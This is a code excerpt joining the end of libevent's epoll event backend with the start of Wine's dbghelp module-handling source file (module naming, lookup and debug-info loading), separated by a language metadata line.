EARLY_CLOSE_IF_HAVE_RDHUP EV_FEATURE_EARLY_CLOSE #endif #include "epolltable-internal.h" #if defined(EVENT__HAVE_SYS_TIMERFD_H) && \ defined(EVENT__HAVE_TIMERFD_CREATE) && \ defined(HAVE_POSIX_MONOTONIC) && defined(TFD_NONBLOCK) && \ defined(TFD_CLOEXEC) /* Note that we only use timerfd if TFD_NONBLOCK and TFD_CLOEXEC are available and working. This means that we can't support it on 2.6.25 (where timerfd was introduced) or 2.6.26, since 2.6.27 introduced those flags. 
*/
#define USING_TIMERFD
#endif

/* Per-event_base private state for the epoll backend. */
struct epollop {
	struct epoll_event *events; /* buffer handed to epoll_wait() */
	int nevents;                /* capacity of 'events' */
	int epfd;                   /* the epoll instance fd */
#ifdef USING_TIMERFD
	int timerfd;                /* timerfd for fine-grained timeouts, or -1 if unused */
#endif
};

static void *epoll_init(struct event_base *);
static int epoll_dispatch(struct event_base *, struct timeval *);
static void epoll_dealloc(struct event_base *);

/* Backend vtable used when fd changes are batched through the changelist. */
static const struct eventop epollops_changelist = {
	"epoll (with changelist)",
	epoll_init,
	event_changelist_add_,
	event_changelist_del_,
	epoll_dispatch,
	epoll_dealloc,
	1, /* need reinit */
	EV_FEATURE_ET|EV_FEATURE_O1| EARLY_CLOSE_IF_HAVE_RDHUP,
	EVENT_CHANGELIST_FDINFO_SIZE
};

static int epoll_nochangelist_add(struct event_base *base, evutil_socket_t fd,
    short old, short events, void *p);
static int epoll_nochangelist_del(struct event_base *base, evutil_socket_t fd,
    short old, short events, void *p);

/* Default backend vtable: changes are pushed to the kernel immediately. */
const struct eventop epollops = {
	"epoll",
	epoll_init,
	epoll_nochangelist_add,
	epoll_nochangelist_del,
	epoll_dispatch,
	epoll_dealloc,
	1, /* need reinit */
	EV_FEATURE_ET|EV_FEATURE_O1|EV_FEATURE_EARLY_CLOSE,
	0
};

#define INITIAL_NEVENT 32
#define MAX_NEVENT 4096

/* On Linux kernels at least up to 2.6.24.4, epoll can't handle timeout
 * values bigger than (LONG_MAX - 999ULL)/HZ.  HZ in the wild can be
 * as big as 1000, and LONG_MAX can be as small as (1<<31)-1, so the
 * largest number of msec we can support here is 2147482.  Let's
 * round that down by 47 seconds.
 */
#define MAX_EPOLL_TIMEOUT_MSEC (35*60*1000)

/* Create the epoll instance and per-base state; called once per base. */
static void *
epoll_init(struct event_base *base)
{
	int epfd = -1;
	struct epollop *epollop;

#ifdef EVENT__HAVE_EPOLL_CREATE1
	/* First, try the shiny new epoll_create1 interface, if we have it. */
	epfd = epoll_create1(EPOLL_CLOEXEC);
#endif
	if (epfd == -1) {
		/* Initialize the kernel queue using the old interface.
		   (The size field is ignored since 2.6.8.) */
		if ((epfd = epoll_create(32000)) == -1) {
			if (errno != ENOSYS)
				event_warn("epoll_create");
			return (NULL);
		}
		evutil_make_socket_closeonexec(epfd);
	}

	if (!(epollop = mm_calloc(1, sizeof(struct epollop)))) {
		close(epfd);
		return (NULL);
	}

	epollop->epfd = epfd;

	/* Initialize fields */
	epollop->events = mm_calloc(INITIAL_NEVENT, sizeof(struct epoll_event));
	if (epollop->events == NULL) {
		mm_free(epollop);
		close(epfd);
		return (NULL);
	}
	epollop->nevents = INITIAL_NEVENT;

	/* Opt into the changelist variant via base flag or environment. */
	if ((base->flags & EVENT_BASE_FLAG_EPOLL_USE_CHANGELIST) != 0 ||
	    ((base->flags & EVENT_BASE_FLAG_IGNORE_ENV) == 0 &&
		evutil_getenv_("EVENT_EPOLL_USE_CHANGELIST") != NULL)) {
		base->evsel = &epollops_changelist;
	}

#ifdef USING_TIMERFD
	/*
	  The epoll interface ordinarily gives us one-millisecond precision,
	  so on Linux it makes perfect sense to use the CLOCK_MONOTONIC_COARSE
	  timer.  But when the user has set the new PRECISE_TIMER flag for an
	  event_base, we can try to use timerfd to give them finer granularity.
	*/
	if ((base->flags & EVENT_BASE_FLAG_PRECISE_TIMER) &&
	    base->monotonic_timer.monotonic_clock == CLOCK_MONOTONIC) {
		int fd;
		fd = epollop->timerfd = timerfd_create(CLOCK_MONOTONIC, TFD_NONBLOCK|TFD_CLOEXEC);
		if (epollop->timerfd >= 0) {
			struct epoll_event epev;
			memset(&epev, 0, sizeof(epev));
			epev.data.fd = epollop->timerfd;
			epev.events = EPOLLIN;
			if (epoll_ctl(epollop->epfd, EPOLL_CTL_ADD, fd, &epev) < 0) {
				event_warn("epoll_ctl(timerfd)");
				close(fd);
				epollop->timerfd = -1;
			}
		} else {
			if (errno != EINVAL && errno != ENOSYS) {
				/* These errors probably mean that we were
				 * compiled with timerfd/TFD_* support, but
				 * we're running on a kernel that lacks those. */
				event_warn("timerfd_create");
			}
			epollop->timerfd = -1;
		}
	} else {
		epollop->timerfd = -1;
	}
#endif

	evsig_init_(base);

	return (epollop);
}

/* Debug helper: render an EV_CHANGE_* mask as a short word. */
static const char *
change_to_string(int change)
{
	change &= (EV_CHANGE_ADD|EV_CHANGE_DEL);
	if (change == EV_CHANGE_ADD) {
		return "add";
	} else if (change == EV_CHANGE_DEL) {
		return "del";
	} else if (change == 0) {
		return "none";
	} else {
		return "???";
	}
}

/* Debug helper: render an EPOLL_CTL_* opcode as text. */
static const char *
epoll_op_to_string(int op)
{
	return op == EPOLL_CTL_ADD?"ADD":
	    op == EPOLL_CTL_DEL?"DEL":
	    op == EPOLL_CTL_MOD?"MOD":
	    "???";
}

/* Expands to the format string + arguments for logging one change. */
#define PRINT_CHANGES(op, events, ch, status)  \
	"Epoll %s(%d) on fd %d " status ". "   \
	"Old events were %d; "                 \
	"read change was %d (%s); "            \
	"write change was %d (%s); "           \
	"close change was %d (%s)",            \
	epoll_op_to_string(op),                \
	events,                                \
	ch->fd,                                \
	ch->old_events,                        \
	ch->read_change,                       \
	change_to_string(ch->read_change),     \
	ch->write_change,                      \
	change_to_string(ch->write_change),    \
	ch->close_change,                      \
	change_to_string(ch->close_change)

/* Translate one event_change into an epoll_ctl call, retrying with a
 * different opcode for the known errno cases (closed+reopened fd,
 * dup'd fd sharing an epitem, already-gone fd on DEL). */
static int
epoll_apply_one_change(struct event_base *base,
    struct epollop *epollop,
    const struct event_change *ch)
{
	struct epoll_event epev;
	int op, events = 0;
	int idx;

	/* Look up the opcode and event mask from the precomputed table. */
	idx = EPOLL_OP_TABLE_INDEX(ch);
	op = epoll_op_table[idx].op;
	events = epoll_op_table[idx].events;

	if (!events) {
		EVUTIL_ASSERT(op == 0);
		return 0;
	}

	if ((ch->read_change|ch->write_change) & EV_CHANGE_ET)
		events |= EPOLLET;

	memset(&epev, 0, sizeof(epev));
	epev.data.fd = ch->fd;
	epev.events = events;
	if (epoll_ctl(epollop->epfd, op, ch->fd, &epev) == 0) {
		event_debug((PRINT_CHANGES(op, epev.events, ch, "okay")));
		return 0;
	}

	switch (op) {
	case EPOLL_CTL_MOD:
		if (errno == ENOENT) {
			/* If a MOD operation fails with ENOENT, the
			 * fd was probably closed and re-opened.  We
			 * should retry the operation as an ADD.
			 */
			if (epoll_ctl(epollop->epfd, EPOLL_CTL_ADD, ch->fd, &epev) == -1) {
				event_warn("Epoll MOD(%d) on %d retried as ADD; that failed too",
				    (int)epev.events, ch->fd);
				return -1;
			} else {
				event_debug(("Epoll MOD(%d) on %d retried as ADD; succeeded.",
					(int)epev.events,
					ch->fd));
				return 0;
			}
		}
		break;
	case EPOLL_CTL_ADD:
		if (errno == EEXIST) {
			/* If an ADD operation fails with EEXIST,
			 * either the operation was redundant (as with a
			 * precautionary add), or we ran into a fun
			 * kernel bug where using dup*() to duplicate the
			 * same file into the same fd gives you the same epitem
			 * rather than a fresh one.  For the second case,
			 * we must retry with MOD. */
			if (epoll_ctl(epollop->epfd, EPOLL_CTL_MOD, ch->fd, &epev) == -1) {
				event_warn("Epoll ADD(%d) on %d retried as MOD; that failed too",
				    (int)epev.events, ch->fd);
				return -1;
			} else {
				event_debug(("Epoll ADD(%d) on %d retried as MOD; succeeded.",
					(int)epev.events,
					ch->fd));
				return 0;
			}
		}
		break;
	case EPOLL_CTL_DEL:
		if (errno == ENOENT || errno == EBADF || errno == EPERM) {
			/* If a delete fails with one of these errors,
			 * that's fine too: we closed the fd before we
			 * got around to calling epoll_dispatch. */
			event_debug(("Epoll DEL(%d) on fd %d gave %s: DEL was unnecessary.",
				(int)epev.events,
				ch->fd,
				strerror(errno)));
			return 0;
		}
		break;
	default:
		break;
	}

	event_warn(PRINT_CHANGES(op, epev.events, ch, "failed"));
	return -1;
}

/* Apply every queued change; returns -1 if any single change failed. */
static int
epoll_apply_changes(struct event_base *base)
{
	struct event_changelist *changelist = &base->changelist;
	struct epollop *epollop = base->evbase;
	struct event_change *ch;

	int r = 0;
	int i;

	for (i = 0; i < changelist->n_changes; ++i) {
		ch = &changelist->changes[i];
		if (epoll_apply_one_change(base, epollop, ch) < 0)
			r = -1;
	}

	return (r);
}

/* Non-changelist path: build a one-off event_change and apply it now. */
static int
epoll_nochangelist_add(struct event_base *base, evutil_socket_t fd,
    short old, short events, void *p)
{
	struct event_change ch;
	ch.fd = fd;
	ch.old_events = old;
	ch.read_change = ch.write_change = ch.close_change = 0;
	if (events & EV_WRITE)
		ch.write_change = EV_CHANGE_ADD |
		    (events & EV_ET);
	if (events & EV_READ)
		ch.read_change = EV_CHANGE_ADD |
		    (events & EV_ET);
	if (events & EV_CLOSED)
		ch.close_change = EV_CHANGE_ADD |
		    (events & EV_ET);

	return epoll_apply_one_change(base, base->evbase, &ch);
}

/* Non-changelist path: immediate deletion counterpart of the above. */
static int
epoll_nochangelist_del(struct event_base *base, evutil_socket_t fd,
    short old, short events, void *p)
{
	struct event_change ch;
	ch.fd = fd;
	ch.old_events = old;
	ch.read_change = ch.write_change = ch.close_change = 0;
	if (events & EV_WRITE)
		ch.write_change = EV_CHANGE_DEL |
		    (events & EV_ET);
	if (events & EV_READ)
		ch.read_change = EV_CHANGE_DEL |
		    (events & EV_ET);
	if (events & EV_CLOSED)
		ch.close_change = EV_CHANGE_DEL |
		    (events & EV_ET);

	return epoll_apply_one_change(base, base->evbase, &ch);
}

/* Wait for kernel events (base lock dropped around epoll_wait) and
 * activate the matching read/write/closed events on the base. */
static int
epoll_dispatch(struct event_base *base, struct timeval *tv)
{
	struct epollop *epollop = base->evbase;
	struct epoll_event *events = epollop->events;
	int i, res;
	long timeout = -1;

#ifdef USING_TIMERFD
	if (epollop->timerfd >= 0) {
		struct itimerspec is;
		is.it_interval.tv_sec = 0;
		is.it_interval.tv_nsec = 0;
		if (tv == NULL) {
			/* No timeout; disarm the timer. */
			is.it_value.tv_sec = 0;
			is.it_value.tv_nsec = 0;
		} else {
			if (tv->tv_sec == 0 && tv->tv_usec == 0) {
				/* we need to exit immediately; timerfd can't
				 * do that. */
				timeout = 0;
			}
			is.it_value.tv_sec = tv->tv_sec;
			is.it_value.tv_nsec = tv->tv_usec * 1000;
		}
		/* TODO: we could avoid unnecessary syscalls here by only
		   calling timerfd_settime when the top timeout changes, or
		   when we're called with a different timeval.
		*/
		if (timerfd_settime(epollop->timerfd, 0, &is, NULL) < 0) {
			event_warn("timerfd_settime");
		}
	} else
#endif
	if (tv != NULL) {
		timeout = evutil_tv_to_msec_(tv);
		if (timeout < 0 || timeout > MAX_EPOLL_TIMEOUT_MSEC) {
			/* Linux kernels can wait forever if the timeout is
			 * too big; see comment on MAX_EPOLL_TIMEOUT_MSEC. */
			timeout = MAX_EPOLL_TIMEOUT_MSEC;
		}
	}

	epoll_apply_changes(base);
	event_changelist_remove_all_(&base->changelist, base);

	/* Drop the base lock while blocked in the kernel. */
	EVBASE_RELEASE_LOCK(base, th_base_lock);

	res = epoll_wait(epollop->epfd, events, epollop->nevents, timeout);

	EVBASE_ACQUIRE_LOCK(base, th_base_lock);

	if (res == -1) {
		if (errno != EINTR) {
			event_warn("epoll_wait");
			return (-1);
		}
		return (0);
	}

	event_debug(("%s: epoll_wait reports %d", __func__, res));
	EVUTIL_ASSERT(res <= epollop->nevents);

	for (i = 0; i < res; i++) {
		int what = events[i].events;
		short ev = 0;
#ifdef USING_TIMERFD
		/* The timerfd is only a wakeup mechanism; don't report it. */
		if (events[i].data.fd == epollop->timerfd)
			continue;
#endif

		if (what & (EPOLLHUP|EPOLLERR)) {
			ev = EV_READ | EV_WRITE;
		} else {
			if (what & EPOLLIN)
				ev |= EV_READ;
			if (what & EPOLLOUT)
				ev |= EV_WRITE;
			if (what & EPOLLRDHUP)
				ev |= EV_CLOSED;
		}

		if (!ev)
			continue;

		evmap_io_active_(base, events[i].data.fd, ev | EV_ET);
	}

	if (res == epollop->nevents && epollop->nevents < MAX_NEVENT) {
		/* We used all of the event space this time.  We should
		   be ready for more events next time. */
		int new_nevents = epollop->nevents * 2;
		struct epoll_event *new_events;

		new_events = mm_realloc(epollop->events,
		    new_nevents * sizeof(struct epoll_event));
		if (new_events) {
			epollop->events = new_events;
			epollop->nevents = new_nevents;
		}
	}

	return (0);
}

/* Release everything epoll_init allocated: signal state, the event
 * buffer, the epoll fd and (if any) the timerfd. */
static void
epoll_dealloc(struct event_base *base)
{
	struct epollop *epollop = base->evbase;

	evsig_dealloc_(base);
	if (epollop->events)
		mm_free(epollop->events);
	if (epollop->epfd >= 0)
		close(epollop->epfd);
#ifdef USING_TIMERFD
	if (epollop->timerfd >= 0)
		close(epollop->timerfd);
#endif

	memset(epollop, 0, sizeof(struct epollop));
	mm_free(epollop);
}

#endif /* EVENT__HAVE_EPOLL */
{ "language": "C" }
/*
 * File module.c - module handling for the wine debugger
 *
 * Copyright (C) 1993, Eric Youngdale.
 * 		 2000-2007, Eric Pouech
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA
 */

#include "config.h"
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <assert.h>

#include "dbghelp_private.h"
#include "psapi.h"
#include "winternl.h"
#include "wine/debug.h"
#include "wine/heap.h"

WINE_DEFAULT_DEBUG_CHANNEL(dbghelp);

const WCHAR        S_ElfW[]         = {'<','e','l','f','>','\0'};
const WCHAR        S_WineLoaderW[]  = {'<','w','i','n','e','-','l','o','a','d','e','r','>','\0'};
static const WCHAR S_DotSoW[]       = {'.','s','o','\0'};
static const WCHAR S_DotDylibW[]    = {'.','d','y','l','i','b','\0'};
static const WCHAR S_DotPdbW[]      = {'.','p','d','b','\0'};
static const WCHAR S_DotDbgW[]      = {'.','d','b','g','\0'};
const WCHAR        S_SlashW[]       = {'/','\0'};

static const WCHAR S_AcmW[] = {'.','a','c','m','\0'};
static const WCHAR S_DllW[] = {'.','d','l','l','\0'};
static const WCHAR S_DrvW[] = {'.','d','r','v','\0'};
static const WCHAR S_ExeW[] = {'.','e','x','e','\0'};
static const WCHAR S_OcxW[] = {'.','o','c','x','\0'};
static const WCHAR S_VxdW[] = {'.','v','x','d','\0'};
static const WCHAR * const ext[] = {S_AcmW, S_DllW, S_DrvW, S_ExeW, S_OcxW, S_VxdW, NULL};

/* If the last 'len' chars of 'ptr' end in one of the known module
 * extensions (case-insensitive), return that extension's length;
 * otherwise return 0. */
static int match_ext(const WCHAR* ptr, size_t len)
{
    const WCHAR* const *e;
    size_t      l;

    for (e = ext; *e; e++)
    {
        l = strlenW(*e);
        if (l >= len) return 0;
        if (strncmpiW(&ptr[len - l], *e, l)) continue;
        return l;
    }
    return 0;
}

/* Return a pointer to the basename part of 'name' (after the last
 * '/' or '\\'), scanning backwards from 'endptr' (or the NUL). */
static const WCHAR* get_filename(const WCHAR* name, const WCHAR* endptr)
{
    const WCHAR*        ptr;

    if (!endptr) endptr = name + strlenW(name);
    for (ptr = endptr - 1; ptr >= name; ptr--)
    {
        if (*ptr == '/' || *ptr == '\\') break;
    }
    return ++ptr;
}

/* Check whether 'module' names the wine loader binary, either as given
 * by $WINELOADER or the default "wine"/"wine64" names. */
static BOOL is_wine_loader(const WCHAR *module)
{
    static const WCHAR wineW[] = {'w','i','n','e',0};
    static const WCHAR suffixW[] = {'6','4',0};
    const WCHAR *filename = get_filename(module, NULL);
    const char *ptr, *p;
    BOOL ret = FALSE;
    WCHAR *buffer;
    DWORD len;

    if ((ptr = getenv("WINELOADER")))
    {
        if ((p = strrchr(ptr, '/'))) ptr = p + 1;
        len = 2 + MultiByteToWideChar( CP_UNIXCP, 0, ptr, -1, NULL, 0 );
        buffer = heap_alloc( len * sizeof(WCHAR) );
        MultiByteToWideChar( CP_UNIXCP, 0, ptr, -1, buffer, len );
    }
    else
    {
        buffer = heap_alloc( sizeof(wineW) + 2 * sizeof(WCHAR) );
        strcpyW( buffer, wineW );
    }

    if (!strcmpW( filename, buffer )) ret = TRUE;

    /* also accept the name with a "64" suffix appended */
    strcatW( buffer, suffixW );
    if (!strcmpW( filename, buffer )) ret = TRUE;

    heap_free( buffer );
    return ret;
}

/* Derive a lower-case short module name from path 'in' into 'out'
 * (capacity 'size'): strip directory and known extensions, and map
 * the wine loader / ELF shared objects to the <wine-loader>/<elf>
 * pseudo names. */
static void module_fill_module(const WCHAR* in, WCHAR* out, size_t size)
{
    const WCHAR *ptr, *endptr;
    size_t      len, l;

    ptr = get_filename(in, endptr = in + strlenW(in));
    len = min(endptr - ptr, size - 1);
    memcpy(out, ptr, len * sizeof(WCHAR));
    out[len] = '\0';
    if (len > 4 && (l = match_ext(out, len)))
        out[len - l] = '\0';
    else if (is_wine_loader(out))
        lstrcpynW(out, S_WineLoaderW, size);
    else
    {
        if (len > 3 && !strcmpiW(&out[len - 3], S_DotSoW) &&
            (l = match_ext(out, len - 3)))
            strcpyW(&out[len - l - 3], S_ElfW);
    }
    while ((*out = tolowerW(*out))) out++;
}

/* Set both the public ModuleName and the internal modulename from 'name'. */
void module_set_module(struct module* module, const WCHAR* name)
{
    module_fill_module(name, module->module.ModuleName, ARRAY_SIZE(module->module.ModuleName));
    module_fill_module(name, module->modulename, ARRAY_SIZE(module->modulename));
}

/* Returned string must be freed by caller */
WCHAR *get_wine_loader_name(struct process *pcs)
{
    static const WCHAR wineW[] = {'w','i','n','e',0};
    static const WCHAR suffixW[] = {'6','4',0};
    WCHAR *buffer, *p;
    const char *env;

    /* All binaries are loaded with WINELOADER (if run from tree) or by the
     * main executable
     */
    if ((env = getenv("WINELOADER")))
    {
        DWORD len = 2 + MultiByteToWideChar( CP_UNIXCP, 0, env, -1, NULL, 0 );
        buffer = heap_alloc( len * sizeof(WCHAR) );
        MultiByteToWideChar( CP_UNIXCP, 0, env, -1, buffer, len );
    }
    else
    {
        buffer = heap_alloc( sizeof(wineW) + 2 * sizeof(WCHAR) );
        strcpyW( buffer, wineW );
    }

    /* strip any existing "64" suffix, then re-append it iff the target
     * process is 64-bit */
    p = buffer + strlenW( buffer ) - strlenW( suffixW );
    if (p > buffer && !strcmpW( p, suffixW )) *p = 0;

    if (pcs->is_64bit) strcatW(buffer, suffixW);

    TRACE( "returning %s\n", debugstr_w(buffer) );
    return buffer;
}

/* Human-readable module type for trace output. */
static const char* get_module_type(enum module_type type, BOOL virtual)
{
    switch (type)
    {
    case DMT_ELF: return virtual ? "Virtual ELF" : "ELF";
    case DMT_PE: return virtual ? "Virtual PE" : "PE";
    case DMT_MACHO: return virtual ? "Virtual Mach-O" : "Mach-O";
    default: return "---";
    }
}

/***********************************************************************
 * Creates and links a new module to a process
 */
struct module* module_new(struct process* pcs, const WCHAR* name,
                          enum module_type type, BOOL virtual,
                          DWORD64 mod_addr, DWORD64 size,
                          unsigned long stamp, unsigned long checksum)
{
    struct module*      module;
    unsigned            i;

    assert(type == DMT_ELF || type == DMT_PE || type == DMT_MACHO);
    if (!(module = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(*module))))
        return NULL;

    /* link at the head of the process's module list */
    module->next = pcs->lmodules;
    pcs->lmodules = module;

    TRACE("=> %s %s-%s %s\n",
          get_module_type(type, virtual),
          wine_dbgstr_longlong(mod_addr), wine_dbgstr_longlong(mod_addr + size),
          debugstr_w(name));

    pool_init(&module->pool, 65536);

    module->process = pcs;
    module->module.SizeOfStruct = sizeof(module->module);
    module->module.BaseOfImage = mod_addr;
    module->module.ImageSize = size;
    module_set_module(module, name);
    module->module.ImageName[0] = '\0';
    lstrcpynW(module->module.LoadedImageName, name, ARRAY_SIZE(module->module.LoadedImageName));
    module->module.SymType = SymNone;
    module->module.NumSyms = 0;
    module->module.TimeDateStamp = stamp;
    module->module.CheckSum = checksum;

    memset(module->module.LoadedPdbName, 0, sizeof(module->module.LoadedPdbName));
    module->module.CVSig = 0;
    memset(module->module.CVData, 0, sizeof(module->module.CVData));
    module->module.PdbSig = 0;
    memset(&module->module.PdbSig70, 0, sizeof(module->module.PdbSig70));
    module->module.PdbAge = 0;
    module->module.PdbUnmatched = FALSE;
    module->module.DbgUnmatched = FALSE;
    module->module.LineNumbers = FALSE;
    module->module.GlobalSymbols = FALSE;
    module->module.TypeInfo = FALSE;
    module->module.SourceIndexed = FALSE;
    module->module.Publics = FALSE;

    module->reloc_delta       = 0;
    module->type              = type;
    module->is_virtual        = virtual;
    for (i = 0; i < DFI_LAST; i++) module->format_info[i] = NULL;
    module->sortlist_valid    = FALSE;
    module->sorttab_size      = 0;
    module->addr_sorttab      = NULL;
    module->num_sorttab       = 0;
    module->num_symbols       = 0;

    vector_init(&module->vsymt, sizeof(struct symt*), 128);
    /* FIXME: this seems a bit too high (on a per module basis)
     * need some statistics about this
     */
    hash_table_init(&module->pool, &module->ht_symbols, 4096);
    hash_table_init(&module->pool, &module->ht_types,   4096);

    vector_init(&module->vtypes, sizeof(struct symt*),  32);

    module->sources_used      = 0;
    module->sources_alloc     = 0;
    module->sources           = 0;
    wine_rb_init(&module->sources_offsets_tree, source_rb_compare);

    return module;
}

/***********************************************************************
 *	module_find_by_nameW
 *
 */
struct module* module_find_by_nameW(const struct process* pcs, const WCHAR* name)
{
    struct module*      module;

    for (module = pcs->lmodules; module; module = module->next)
    {
        if (!strcmpiW(name, module->module.ModuleName)) return module;
    }
    SetLastError(ERROR_INVALID_NAME);
    return NULL;
}

/* ANSI wrapper around module_find_by_nameW. */
struct module* module_find_by_nameA(const struct process* pcs, const char* name)
{
    WCHAR wname[MAX_PATH];

    MultiByteToWideChar(CP_ACP, 0, name, -1, wname, ARRAY_SIZE(wname));
    return module_find_by_nameW(pcs, wname);
}

/***********************************************************************
 *	module_is_already_loaded
 *
 */
struct module* module_is_already_loaded(const struct process* pcs, const WCHAR* name)
{
    struct module*      module;
    const WCHAR*        filename;

    /* first compare the loaded image name... */
    for (module = pcs->lmodules; module; module = module->next)
    {
        if (!strcmpiW(name, module->module.LoadedImageName))
            return module;
    }
    /* then compare the standard filenames (without the path) ... */
    filename = get_filename(name, NULL);
    for (module = pcs->lmodules; module; module = module->next)
    {
        if (!strcmpiW(filename, get_filename(module->module.LoadedImageName, NULL)))
            return module;
    }
    SetLastError(ERROR_INVALID_NAME);
    return NULL;
}

/***********************************************************************
 *           module_get_container
 *
 */
static struct module* module_get_container(const struct process* pcs,
                                           const struct module* inner)
{
    struct module*      module;

    /* a container's address range fully encloses the inner module's */
    for (module = pcs->lmodules; module; module = module->next)
    {
        if (module != inner &&
            module->module.BaseOfImage <= inner->module.BaseOfImage &&
            module->module.BaseOfImage + module->module.ImageSize >=
            inner->module.BaseOfImage + inner->module.ImageSize)
            return module;
    }
    return NULL;
}

/***********************************************************************
 *           module_get_containee
 *
 */
struct module* module_get_containee(const struct process* pcs, const struct module* outer)
{
    struct module*      module;

    for (module = pcs->lmodules; module; module = module->next)
    {
        if (module != outer &&
            outer->module.BaseOfImage <= module->module.BaseOfImage &&
            outer->module.BaseOfImage + outer->module.ImageSize >=
            module->module.BaseOfImage + module->module.ImageSize)
            return module;
    }
    return NULL;
}

/******************************************************************
 *		module_get_debug
 *
 * get the debug information from a module:
 * - if the module's type is deferred, then force loading of debug info (and return
 *   the module itself)
 * - if the module has no debug info and has an ELF container, then return the ELF
 *   container (and also force the ELF container's debug info loading if deferred)
 * - otherwise return the module itself if it has some debug info
 */
BOOL module_get_debug(struct module_pair* pair)
{
    IMAGEHLP_DEFERRED_SYMBOL_LOADW64    idslW64;

    if (!pair->requested) return FALSE;
    /* for a PE builtin, always get info from container */
    if (!(pair->effective = module_get_container(pair->pcs, pair->requested)))
        pair->effective = pair->requested;
    /* if deferred, force loading */
    if (pair->effective->module.SymType == SymDeferred)
    {
        BOOL ret;

        if (pair->effective->is_virtual) ret = FALSE;
        else switch (pair->effective->type)
        {
        case DMT_ELF:
            ret = elf_load_debug_info(pair->effective);
            break;
        case DMT_PE:
            idslW64.SizeOfStruct = sizeof(idslW64);
            idslW64.BaseOfImage = pair->effective->module.BaseOfImage;
            idslW64.CheckSum = pair->effective->module.CheckSum;
            idslW64.TimeDateStamp = pair->effective->module.TimeDateStamp;
            memcpy(idslW64.FileName, pair->effective->module.ImageName,
                   sizeof(pair->effective->module.ImageName));
            idslW64.Reparse = FALSE;
            idslW64.hFile = INVALID_HANDLE_VALUE;

            /* notify the client around the (potentially slow) PE debug
             * info load */
            pcs_callback(pair->pcs, CBA_DEFERRED_SYMBOL_LOAD_START, &idslW64);
            ret = pe_load_debug_info(pair->pcs, pair->effective);
            pcs_callback(pair->pcs,
                         ret ? CBA_DEFERRED_SYMBOL_LOAD_COMPLETE : CBA_DEFERRED_SYMBOL_LOAD_FAILURE,
                         &idslW64);
            break;
        case DMT_MACHO:
            ret = macho_load_debug_info(pair->pcs, pair->effective);
            break;
        default:
            ret = FALSE;
            break;
        }
        if (!ret) pair->effective->module.SymType = SymNone;
        assert(pair->effective->module.SymType != SymDeferred);
        pair->effective->module.NumSyms = pair->effective->ht_symbols.num_elts;
    }
    return pair->effective->module.SymType != SymNone;
}

/***********************************************************************
 *	module_find_by_addr
 *
 * either the addr where module is loaded, or any address inside the
 * module
 */
struct module* module_find_by_addr(const struct process* pcs, DWORD64 addr,
                                   enum module_type type)
{
    struct module*      module;

    if (type == DMT_UNKNOWN)
    {
        /* PE wins over ELF, which wins over Mach-O */
        if ((module = module_find_by_addr(pcs, addr, DMT_PE)) ||
            (module = module_find_by_addr(pcs, addr, DMT_ELF)) ||
            (module = module_find_by_addr(pcs, addr, DMT_MACHO)))
            return module;
    }
    else
    {
        for (module = pcs->lmodules; module; module = module->next)
        {
            if (type == module->type && addr >= module->module.BaseOfImage &&
                addr < module->module.BaseOfImage + module->module.ImageSize)
                return module;
        }
    }
    /* NOTE(review): on this path 'module' is NULL, so this returns NULL
     * with last error set */
    SetLastError(ERROR_MOD_NOT_FOUND);
    return module;
}

/******************************************************************
 *		module_is_container_loaded
 *
 * checks whether the native container, for a (supposed) PE builtin is
 * already loaded
 */
static BOOL module_is_container_loaded(const struct process* pcs,
                                       const WCHAR* ImageName, DWORD64 base)
{
    size_t              len;
    struct module*      module;
    PCWSTR              filename, modname;

    if (!base) return FALSE;
    filename = get_filename(ImageName, NULL);
    len = strlenW(filename);

    for (module = pcs->lmodules; module; module = module->next)
    {
        if ((module->type == DMT_ELF || module->type == DMT_MACHO) &&
            base >= module->module.BaseOfImage &&
            base < module->module.BaseOfImage + module->module.ImageSize)
        {
            modname = get_filename(module->module.LoadedImageName, NULL);
            if (!strncmpiW(modname, filename, len) &&
                !memcmp(modname + len, S_DotSoW, 3 * sizeof(WCHAR)))
            {
                return TRUE;
            }
        }
    }
    /* likely a native PE module */
    WARN("Couldn't find container for %s\n", debugstr_w(ImageName));
    return FALSE;
}

/******************************************************************
 *		module_get_type_by_name
 *
 * Guesses a filename type from its extension
 */
enum module_type module_get_type_by_name(const WCHAR* name)
{
    int len = strlenW(name);

    /* Skip all version extensions (.[digits]) regex: "(\.\d+)*$" */
    do
    {
        int i = len;

        while (i && name[i - 1] >= '0' && name[i - 1] <= '9') i--;

        if (i && name[i - 1] == '.')
            len = i - 1;
        else
            break;
    } while (len);

    /* check for terminating .so or .so.[digit] */
    /* FIXME: Can't rely solely on extension; have to check magic or
     *        stop using .so on Mac OS X. For now, base on platform. */
    if (len > 3 && !memcmp(name + len - 3, S_DotSoW, 3))
#ifdef __APPLE__
        return DMT_MACHO;
#else
        return DMT_ELF;
#endif

    if (len > 6 && !strncmpiW(name + len - 6, S_DotDylibW, 6))
        return DMT_MACHO;

    if (len > 4 && !strncmpiW(name + len - 4, S_DotPdbW, 4))
        return DMT_PDB;

    if (len > 4 && !strncmpiW(name + len - 4, S_DotDbgW, 4))
        return DMT_DBG;

    /* wine is also a native module (Mach-O on Mac OS X, ELF elsewhere) */
    if (is_wine_loader(name))
    {
#ifdef __APPLE__
        return DMT_MACHO;
#else
        return DMT_ELF;
#endif
    }
    return DMT_PE;
}

/******************************************************************
 *		refresh_module_list
 */
static BOOL refresh_module_list(struct process* pcs)
{
    /* force transparent ELF and Mach-O loading / unloading */
    return elf_synchronize_module_list(pcs) || macho_synchronize_module_list(pcs);
}

/***********************************************************************
 *			SymLoadModule (DBGHELP.@)
 */
DWORD WINAPI SymLoadModule(HANDLE hProcess, HANDLE hFile, PCSTR ImageName,
                           PCSTR ModuleName, DWORD BaseOfDll, DWORD SizeOfDll)
{
    return SymLoadModuleEx(hProcess, hFile, ImageName, ModuleName,
                           BaseOfDll, SizeOfDll, NULL, 0);
}

/***********************************************************************
 *			SymLoadModuleEx (DBGHELP.@)
 */
